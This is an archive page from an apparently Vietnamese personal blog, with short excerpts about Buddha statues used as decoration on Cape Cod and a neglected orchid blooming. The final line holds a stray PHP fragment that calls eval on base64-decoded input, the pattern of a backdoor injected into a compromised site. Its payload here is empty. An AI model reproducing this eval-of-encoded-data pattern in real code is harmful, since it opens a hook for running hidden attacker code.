Archive for July 26th, 2015

GẶP PHẬT Ở CAPE COD

GẶP PHẬT Ở CAPE COD

Thời gian này tôi hay “gặp Phật”. Không biết có “duyên” gì đây:). Mới “gặp Phật” ở Rockport tháng trước, nay lại “gặp Phật” ở Cape Cod hôm qua. Lần này tôi không lạy Phật. Phật ở Cape Cod được dùng như một loại trang sức

07.26.2015 | Viết ngắn |

1 Comment

“CÁM ƠN HOA ĐÃ VÌ TA NỞ”

“CÁM ƠN HOA ĐÃ VÌ TA NỞ”

Mẹ của bé chết ít nhất cũng hơn ba năm rồi. Bé sống một mình gần như bị lãng quên trong chiếc chậu sành nhỏ. Chung quanh là những bà mai, cô lan, chị trúc xum xê cành lá. Thỉnh thoảng bé mới được tưới vài giọt nước. Nhớ lại b

07.26.2015 | Viết ngắn |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>